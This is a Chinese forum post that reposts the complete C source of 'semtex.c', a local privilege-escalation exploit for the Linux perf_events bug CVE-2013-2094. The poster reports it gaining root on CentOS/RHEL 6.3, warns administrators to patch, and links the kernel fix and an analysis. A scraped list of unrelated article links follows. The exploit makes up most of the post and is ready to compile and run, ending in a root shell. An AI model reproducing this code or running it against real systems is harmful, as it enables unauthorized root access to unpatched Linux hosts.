[CVE-2013-2094]Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64

GaRY  | 2013-05-14 15:54

http://sd.fucksheep.org/warez/semtex.c

又一个linux安全的偶像sd牛刚刚发出的作品。。感觉上基本是个通杀的东西,但是目前为止,我的测试是rh6.3和centos6.3,2.6.32 kernel成功root,6.4上目前只是挂了系统,只能证明漏洞是存在的。 
待有缘人后来者修正之。

也要预警各位,赶紧修复各自的服务器。虽然貌似也就linux 3.8.10修了这个漏洞。。。

/* 
* linux 2.6.37-3.x.x x86_64, ~100 LOC 
* gcc-4.6 -O2 semtex.c && ./a.out 
* 2010 sd@fucksheep.org, salut! 

* update may 2013: 
* seems like centos 2.6.32 backported the perf bug, lol. 
* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. 
*/

#define _GNU_SOURCE 1 
#include <stdint.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/mman.h> 
#include <syscall.h> 
#include <stdint.h> 
#include <assert.h>

#define BASE  0x380000000 
#define SIZE  0x010000000 
#define KSIZE  0x2000000 
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() { 
  int i,j,k; 
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; 
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); 
  uint64_t kbase = ((uint64_t)current)>>36; 
  uint32_t *fixptr = (void*) AB(1); 
  *fixptr = -1;

for (i=0; i<4000; i+=4) { 
    uint64_t *p = (void *)&current[i]; 
    uint32_t *t = (void*) p[0]; 
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++) 
      if (((uint32_t*)uids)[k] != t[j+k]) goto next; 
      for (i = 0; i < 8; i++) t[j+i] = 0; 
      for (i = 0; i < 10; i++) t[j+9+i] = -1; 
      return; 
next:;    } 
  } 
}

void sheep(uint32_t off) { 
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; 
  int fd = syscall(298, buf, 0, -1, -1, 0); 
  assert(!close(fd)); 
}

int  main() { 
  uint64_t  u,g,needle, kbase, *p; uint8_t *code; 
  uint32_t *map, j = 5; 
  int i; 
  struct { 
    uint16_t limit; 
    uint64_t addr; 
  } __attribute__((packed)) idt; 
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); 
  memset(map, 0, SIZE); 
  sheep(-1); sheep(-2); 
  for (i = 0; i < SIZE/4; i++) if (map[i]) { 
    assert(map[i+1]); 
    break; 
  } 
  assert(i<SIZE/4); 
  asm ("sidt %0" : "=m" (idt)); 
  kbase = idt.addr & 0xff000000; 
  u = getuid(); g = getgid(); 
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); 
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024); 
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27); 
  setresuid(u,u,u); setresgid(g,g,g); 
  while (j--) { 
    needle = AB(j+1); 
    assert(p = memmem(code, 1024, &needle, 8)); 
    if (!p) continue; 
    *p = j?((g<<32)|u):(idt.addr + 0x48); 
  } 
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16); 
  asm("int $0x4");  assert(!setuid(0)); 
  return execl("/bin/bash", "-sh", NULL); 
}

----------------------------- 
5.15 update:

最新消息,CVE号已经出来了。thx@请叫我大神 CVE-2013-2094 
然后影响范围也有所缩减,实际上是3.8.9就已经修复了此漏洞。 
其次这的确是个0day漏洞,目前各大厂商都还没有给出正式的二进制hotfix patch。 
但是linux 内核上是有patch的,各位心急的可以参考下: 
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8176cced706b5e5d15887584150764894e94e02f

如果你们对原理感兴趣,不妨去看看spender对漏洞的解析: 
http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck

LInux 安全测试的更多相关文章

  1. Kali linux渗透测试常用工具汇总1

    1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...

  2. Kali linux渗透测试的艺术 思维导图

    Kali Linux是一个全面的渗透测试平台,其自带的高级工具可以用来识别.检测和利用目标网络中未被发现的漏洞.借助于Kali Linux,你可以根据已定义的业务目标和预定的测试计划,应用合适的测试方 ...

  3. linux下测试磁盘的读写IO速度-简易方法

    linux下测试磁盘的读写IO速度-简易方法 参考资料:https://blog.csdn.net/zqtsx/article/details/25487185 一:使用hdparm命令 这是一个是用 ...

  4. 【Linux】测试环境如何搭建?

    [Linux]测试环境如何搭建? (该文档所在我的百度网盘位置: ) 通常面试会问到会不会搭建测试环境?到底啥是测试环境搭建呢,其实测试环境没有想像的那么高大上,弄个 tomcat,把测试的 war ...

  5. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  6. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  7. Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap

    Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap 网络扫描和嗅探工具——Nmap Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具.该工具可以扫描 ...

  8. Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan

    Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan ARP侦查工具——Netdiscover Netdiscover是一个主动/被动的AR ...

  9. Kail Linux渗透测试教程之Recon-NG框架

    Kail Linux渗透测试教程之Recon-NG框架 信息收集 信息收集是网络攻击最重要的阶段之一.要想进行渗透攻击,就需要收集目标的各类信息.收集到的信息越多,攻击成功的概率也就越大.本章将介绍信 ...

  10. linux上测试磁盘IO速度

    运维工作,经常要测试服务器硬件性能,以此来判断是否存在性能瓶颈. 下面介绍在linux上测试磁盘IO速度的工具: 1.hdparm CentOS中,安装的两种方法: 1) yum安装. # yum i ...

随机推荐

  1. angular学习-入门基础

    angular .caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #00 ...

  2. psd做成HTML相关参考页面

    前端制作(美工)是怎么把PSD制作成页面的? 美工怎么做的我不清楚,因为我是做前端的,我就从前端这个角度说吧. 首先拿到PSD,先分析哪些是要导出为图片的,哪些是可以自己用代码完成的.将图片全部导出, ...

  3. 整数划分 (区间DP)

    整数划分(四) 时间限制:1000 ms  |  内存限制:65535 KB 难度:3   描述 暑假来了,hrdv 又要留学校在参加ACM集训了,集训的生活非常Happy(ps:你懂得),可是他最近 ...

  4. 【kAri OJ620】winoros的树

    时间限制 1000 ms 内存限制 65536 KB 题目描述 winoros 是一个热爱大自然的萌妹子,在植树节的时候,她打算带着集训的朋友们一起去种树. 到了种树的地方,学校给了她们四个不可弯曲. ...

  5. BZOJ-3670 动物园 KMP+奇怪的东西

    YveH爷再刷KMP,DCrusher看他刷KMP,跟着两个人一块刷KMP... 3670: [Noi2014]动物园 Time Limit: 10 Sec Memory Limit: 512 MB ...

  6. HDU 2896 病毒侵袭

    Problem Description 当太阳的光辉逐渐被月亮遮蔽,世界失去了光明,大地迎来最黑暗的时刻....在这样的时刻,人们却异常兴奋——我们能在有生之年看到500年一遇的世界奇观,那是多么幸福 ...

  7. pthread_create线程创建的过程剖析

    http://blog.csdn.net/wangyin159/article/details/47082125 在Linux环境下,pthread库提供的pthread_create()API函数, ...

  8. stl-基本知识

    摘要:本文列出几个基本的STL map和STL set的问题,通过解答这些问题讲解了STL关联容器内部的数据结构,最后提出了关于UNIX/LINUX自带平衡二叉树库函数和map, set选择问题,并分 ...

  9. 用80x86汇编语言编程:1 + 2 + 3 + 4 + 5 + …… + n,和小于100,在屏幕上显示次数和结果。

    ;============================================== ;1+...+n < 100 ;--------------------------------- ...

  10. java 打包过程及如何使用第三方jar包

    地址:http://wenku.baidu.com/view/44a1bbed81c758f5f61f6779.html或者 http://wenku.it168.com/d_000575231.sh ...